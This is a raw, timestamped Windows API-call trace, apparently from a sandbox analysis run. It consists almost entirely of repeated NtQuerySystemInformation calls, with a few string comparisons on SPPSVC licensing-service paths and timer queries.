NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x38, ResultLength=0x0) [0271.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x28, ResultLength=0x0) [0271.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x28, ResultLength=0x0) [0271.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x38, ResultLength=0x0) [0271.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x20, ResultLength=0x0) [0271.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x20, ResultLength=0x0) [0271.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x20, ResultLength=0x0) [0271.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x20, ResultLength=0x0) [0271.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x38, ResultLength=0x0) [0271.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x20, ResultLength=0x0) [0271.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x20, ResultLength=0x0) [0271.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x20, ResultLength=0x0) [0271.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd20, Length=0x50, ResultLength=0x0) [0271.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x28, ResultLength=0x0) [0271.729] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd20, Length=0x50, ResultLength=0x0) [0271.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd20, Length=0x50, ResultLength=0x0) [0271.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd20, Length=0x50, ResultLength=0x0) [0271.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x38, ResultLength=0x0) [0271.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0271.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0271.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0271.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaf0, Length=0x28, ResultLength=0x0) [0271.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x38, ResultLength=0x0) [0271.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x28, ResultLength=0x0) [0271.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x28, ResultLength=0x0) [0271.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x38, ResultLength=0x0) [0271.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x20, ResultLength=0x0) [0271.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x20, ResultLength=0x0) [0271.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x20, ResultLength=0x0) [0271.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x20, ResultLength=0x0) [0271.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x38, ResultLength=0x0) [0271.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x20, ResultLength=0x0) [0271.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x20, ResultLength=0x0) [0271.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x20, ResultLength=0x0) [0271.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf38, Length=0x50, ResultLength=0x0) [0271.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fceb0, Length=0x28, ResultLength=0x0) [0271.743] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf38, Length=0x50, ResultLength=0x0) [0271.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf38, Length=0x50, ResultLength=0x0) [0271.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce20, Length=0x50, ResultLength=0x0) [0271.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcda0, Length=0x28, ResultLength=0x0) [0271.743] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce20, Length=0x50, ResultLength=0x0) [0271.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce20, Length=0x50, ResultLength=0x0) [0271.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce20, Length=0x50, ResultLength=0x0) [0271.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd50, Length=0x38, ResultLength=0x0) [0271.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x28, ResultLength=0x0) [0271.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x28, ResultLength=0x0) [0271.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x28, ResultLength=0x0) [0271.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x28, ResultLength=0x0) [0271.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd50, Length=0x38, ResultLength=0x0) [0271.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x28, ResultLength=0x0) [0271.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x28, ResultLength=0x0) [0271.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd50, Length=0x38, ResultLength=0x0) [0271.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x20, ResultLength=0x0) [0271.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x20, ResultLength=0x0) [0271.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x20, ResultLength=0x0) [0271.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x20, ResultLength=0x0) [0271.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd50, Length=0x38, ResultLength=0x0) [0271.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x20, ResultLength=0x0) [0271.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x20, ResultLength=0x0) [0271.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x20, ResultLength=0x0) [0271.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.755] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf7a68fce80 | out: lpSystemTimeAsFileTime=0xf7a68fce80*(dwLowDateTime=0x345785bb, dwHighDateTime=0x1d63874)) [0271.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf38, Length=0x50, ResultLength=0x0) [0271.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce70, Length=0x28, ResultLength=0x0) [0271.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd88, Length=0x50, ResultLength=0x0) [0271.755] GetTickCount () returned 0x118418b [0271.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc58, Length=0x58, ResultLength=0x0) [0271.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x38, ResultLength=0x0) [0271.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x28, ResultLength=0x0) [0271.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x28, ResultLength=0x0) [0271.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x28, ResultLength=0x0) [0271.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x28, ResultLength=0x0) [0271.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x28, ResultLength=0x0) [0271.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x38, ResultLength=0x0) [0271.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x28, ResultLength=0x0) [0271.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x28, ResultLength=0x0) [0271.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x38, ResultLength=0x0) [0271.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x20, ResultLength=0x0) [0271.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x20, ResultLength=0x0) [0271.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x20, ResultLength=0x0) [0271.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x20, ResultLength=0x0) [0271.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x38, ResultLength=0x0) [0271.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x20, ResultLength=0x0) [0271.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0271.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0271.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc58, Length=0x58, ResultLength=0x0) [0271.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0271.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0271.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0271.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 